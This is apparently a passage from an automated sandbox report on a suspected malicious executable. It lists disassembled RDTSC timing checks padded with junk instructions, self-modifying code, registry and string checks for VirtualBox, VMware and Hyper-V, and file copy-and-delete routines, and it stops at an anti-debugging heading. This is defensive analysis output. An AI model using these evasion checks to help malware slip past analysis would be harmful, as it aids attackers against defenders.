                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4FC810 second address: 4FC81C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 push esi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5017D6 second address: 5017DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5017DB second address: 50181C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007FA49D1B33CFh 0x0000000f jmp 00007FA49D1B33CEh 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 jmp 00007FA49D1B33D3h 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 503B24 second address: 503B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA49CDAB576h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5051E4 second address: 505226 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FA49D1B33D8h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FA49D1B33D0h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FA49D1B33CEh 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5083A9 second address: 5083AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5083AD second address: 5083BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jne 00007FA49D1B33C6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5083BD second address: 5083CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49CDAB57Bh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 507E36 second address: 507E42 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA49D1B33C6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 507E42 second address: 507E4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FA49CDAB576h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 507E4C second address: 507E50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 507FAD second address: 507FC3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA49CDAB576h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 507FC3 second address: 507FED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA49D1B33D2h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FA49D1B33CEh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 507FED second address: 507FF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 509A91 second address: 509A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C52F second address: 51C537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C537 second address: 51C55E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ecx 0x00000007 push edi 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edi 0x0000000b popad 0x0000000c push edx 0x0000000d push ecx 0x0000000e jmp 00007FA49D1B33D5h 0x00000013 pop ecx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 520FEC second address: 520FF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 520FF0 second address: 520FF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 520FF6 second address: 520FFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0A8 second address: 52B0CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jmp 00007FA49D1B33CFh 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 jo 00007FA49D1B33CCh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0CE second address: 52B0D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0D5 second address: 52B102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA49D1B33D0h 0x0000000e jmp 00007FA49D1B33D4h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 531367 second address: 53136D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53136D second address: 531371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 531371 second address: 531381 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007FA49CDAB576h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52FD51 second address: 52FD5E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop esi 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5303B5 second address: 5303BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5303BB second address: 5303C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5303C1 second address: 5303DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push edx 0x00000010 pop edx 0x00000011 jc 00007FA49CDAB576h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a push ebx 0x0000001b pushad 0x0000001c popad 0x0000001d pop ebx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 530508 second address: 530511 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 530511 second address: 53052B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA49CDAB576h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007FA49CDAB576h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53069A second address: 5306A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5306A3 second address: 5306A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 533726 second address: 53372A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 536072 second address: 536076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5361CF second address: 5361D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5361D3 second address: 5361D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5361D7 second address: 5361F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA49D1B33D1h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54605F second address: 546063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 546063 second address: 54607F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49D1B33D6h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54607F second address: 546085 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 546085 second address: 54608F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FA49D1B33C6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5406E4 second address: 5406F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5406F0 second address: 5406F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5406F4 second address: 5406F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 553A80 second address: 553ACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA49D1B33D6h 0x00000009 jmp 00007FA49D1B33D8h 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 jns 00007FA49D1B33D2h 0x00000017 push eax 0x00000018 push edx 0x00000019 js 00007FA49D1B33C6h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 563656 second address: 56365A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56365A second address: 563660 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 563660 second address: 563669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 562544 second address: 562548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 562548 second address: 562571 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49CDAB57Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA49CDAB584h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 562571 second address: 562575 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 562575 second address: 562586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FA49CDAB576h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 562586 second address: 56258F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 56258F second address: 562595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 562595 second address: 5625BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49D1B33CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FA49D1B33D4h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5625BB second address: 5625C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5629DA second address: 5629E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5629E3 second address: 5629ED instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA49CDAB576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 564DBD second address: 564DDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA49D1B33D0h 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jns 00007FA49D1B33C6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 564DDB second address: 564DEA instructions: 0x00000000 rdtsc 0x00000002 js 00007FA49CDAB576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 564DEA second address: 564DF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567A36 second address: 567A9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA49CDAB57Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007FA49CDAB578h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000014h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 sub dword ptr [ebp+122D1E0Dh], esi 0x0000002b push 00000004h 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007FA49CDAB578h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 0000001Ah 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 mov edx, dword ptr [ebp+122D2BC9h] 0x0000004d mov dx, cx 0x00000050 push 1C915807h 0x00000055 pushad 0x00000056 pushad 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567A9F second address: 567AA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567CEE second address: 567CF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567DDA second address: 567DDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567DDF second address: 567DE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 567DE5 second address: 567E0C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA49D1B33D9h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56959B second address: 56959F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56959F second address: 5695B2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA49D1B33CDh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5695B2 second address: 5695C1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jbe 00007FA49CDAB576h 0x00000009 pop edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5695C1 second address: 5695C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B0B3 second address: 56B0B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B0B9 second address: 56B0DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007FA49D1B33C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FA49D1B33D6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56B0DF second address: 56B0F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA49CDAB581h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48DC41 second address: 48DC45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 2E189F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 483F71 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 2E1906 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_000938B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 4_2_000938B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00094910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 4_2_00094910
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0008DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 4_2_0008DA80
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0008E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 4_2_0008E430
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0008ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 4_2_0008ED20
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00094570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 4_2_00094570
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0008DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 4_2_0008DE10
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0008BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 4_2_0008BE70
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00093EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 4_2_00093EA0
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_0008F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 4_2_0008F6B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_000816D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 4_2_000816D0
                Source: C:\Users\user\Desktop\file.exe | Code function: 4_2_00081160 GetSystemInfo,ExitProcess, 4_2_00081160
                Source: file.exe, file.exe, 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000004.00000002.1339731462.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                Source: file.exe, 00000004.00000002.1339731462.0000000000D36000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000004.00000002.1339731462.0000000000D63000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000004.00000002.1339731462.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMwarer
                Source: file.exe, 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_4-13236
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_4-13233
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_4-13288
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_4-13248
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_4-13256
                Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

